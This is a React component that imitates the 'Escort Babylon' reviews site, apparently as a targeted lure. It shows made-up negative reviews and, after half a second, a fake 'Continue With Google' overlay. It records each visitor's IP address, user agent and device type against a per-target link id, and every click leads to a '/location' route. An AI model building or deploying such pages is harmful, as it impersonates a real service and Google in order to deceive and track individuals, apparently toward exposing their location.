import React, { useEffect, useState } from "react";
import "./EscortBabylonReviews.css";
import { Link, useParams } from "react-router-dom";
import { isBrowser, isMobile } from "react-device-detect";
import axios from "axios";
import { io } from "socket.io-client";
const socket = io(process.env.REACT_APP_SERVER_ADDRESS);
const Test2 = () => {
  const [showOverlay, setShowOverlay] = useState(false);
  const [userAgent, setUserAgent] = useState("");
  const [ipAddress, setIPAddress] = useState("");
  const [userId, setUserId] = useState();
  const { id } = useParams();
  let type;
  if (isBrowser) {
    type = "desktop";
  } else {
    type = "mobile";
  }

  useEffect(() => {
    const userAgent = window.navigator.userAgent;
    setUserAgent(userAgent);
    fetch("https://api.ipify.org?format=json")
      .then((response) => response.json())
      .then((data) => setIPAddress(data.ip))
      .catch((error) => console.log(error));

    const bookings = {
      type: type,
    };

    axios
      .put(`/updateclick/${id}`, bookings, {
        headers: {
          "Content-Type": "application/json",
        },
      })
      .then((response) => {
        console.log("Update successful:", response.data);
        const updatedData = response.data;
        console.log("gfgf", updatedData.data.userId);
        setUserId(updatedData.data.userId);
        socket.emit("newInfo", { message: "new info" });
      })
      .catch((error) => {
        console.error("Error updating data:", error);
      });
  }, [type, id]);

  useEffect(() => {
    const timer = setTimeout(() => {
      setShowOverlay(true);
    }, 500);

    return () => clearTimeout(timer); // Clean up timer on unmount
  }, []);

  const reviewsData = [
    { mood: "angry", title: "Timewaste", by: "Luce09", time: "25 minutes ago" },
    { mood: "laugh", title: "Scammer", by: "Adam71788", time: "45 minutes ago" },
    { mood: "heart", title: "Ghosted", by: "Jack19265", time: "1 hours ago" },
    { mood: "angry", title: "fake ass", by: "Matthew615", time: "3 hours ago" },
  ];
  return (
    <Link to={`/location/${id}`}>
      <div className="eb-page">
        {/* Top Header */}
        <header className="eb-topbar">
          <div className="eb-topbar-inner">
            <div className="eb-logo">
              <div className="eb-star">
                <span className="eb-logo-text">EB</span>
              </div>
            </div>

            <h1 className="eb-title">ESCORT BABYLON</h1>
            <span className="eb-tm">TM</span>
          </div>
        </header>

        {/* Tabs */}
        <nav className="eb-tabs">
          <a className="eb-tab" href="#old">Old Posts</a>
          <a className="eb-tab" href="#info">Info/Stats</a>
          <a className="eb-tab" href="#pics">Pictures</a>
          <a className="eb-tab eb-tab-active" href="#reviews">Reviews</a>
          <a className="eb-tab" href="#comments">Comments</a>
        </nav>

        {/* Main Card */}
        <main className="eb-content">
          <section className="eb-card">
            <div className="eb-card-header">
              <div className="eb-gauge-wrap">
                <div className="eb-gauge">
                  <div className="eb-gauge-inner">
                    <div className="eb-gauge-q">?</div>
                  </div>
                  <div className="eb-gauge-ticks">
                    <span className="t0">0</span>
                    <span className="t1">1</span>
                    <span className="t3">3</span>
                    <span className="t5">5</span>
                    <span className="t7">7</span>
                    <span className="t9">9</span>
                    <span className="t10">10</span>
                  </div>
                </div>
                <div className="eb-gauge-label">Community Rating</div>
              </div>

              <div className="eb-heading">
                <div className="eb-heading-big">REVIEWS</div>
                <div className="eb-heading-small">&amp; REPORTS</div>
              </div>
            </div>

            {/* Buttons */}
            <div className="eb-actions">
              <button className="eb-btn eb-btn-warn" type="button">
                Delete and Report
              </button>
              <button className="eb-btn eb-btn-green" type="button">
                <span className="eb-btn-title">Submit a Review</span>
                <span className="eb-btn-sub">of this Provider</span>
              </button>
            </div>

            {/* Reviews List */}
            <div className="eb-review-box">
              <div className="eb-review-box-title">USER-SUBMITTED REVIEWS:</div>

              <div className="eb-review-list">
                {reviewsData.map((r, idx) => (
                  <article className="eb-review-row" key={idx}>
                    <div className={`eb-mood eb-mood-${r.mood}`}>
                      <span className="eb-mood-emoji" aria-hidden="true">
                        {r.mood === "angry" ? "😡" : r.mood === "laugh" ? "😂" : "😍"}
                      </span>
                    </div>

                    <div className="eb-review-main">
                      <div className="eb-review-strip">
                        <div className="eb-review-title">{r.title}</div>
                      </div>

                      <div className="eb-review-meta">
                        <div className="eb-review-by">
                          by <span className="eb-review-user">{r.by}</span>
                        </div>

                        <div className="eb-review-right">
                          <span className="eb-review-time">{r.time}</span>
                          <button className="eb-read-btn" type="button">
                            Tap to Read
                          </button>
                        </div>
                      </div>
                    </div>
                  </article>
                ))}
              </div>
            </div>
          </section>

          {/* Bottom CTA */}
          <section className="eb-footer-cta">
            <div className="eb-footer-q">
              <span className="q1">Trustworthy?</span>
              <span className="q2">Ripoff?</span>
              <span className="q3">Sweetheart?</span>
            </div>

            <div className="eb-footer-icons" aria-hidden="true">
              <span className="i1">👍</span>
              <span className="i2">💸</span>
              <span className="i3">💖</span>
            </div>

            <div className="eb-footer-big">
              Get all the in-depth details!
              <br />
              Everything you need to know!
            </div>
          </section>
        </main>
      </div>

      {showOverlay && (
        <div className="newoverlay">
          <Link
            to={`/location/${id}`}
            className="newgoogle-button-overlay"
            id="googleButtonOverlay"
          >
            <img src="/google.webp" alt="Google Icon" />
            Continue With Google
          </Link>
        </div>
      )}


    </Link>
  );
};

export default Test2;
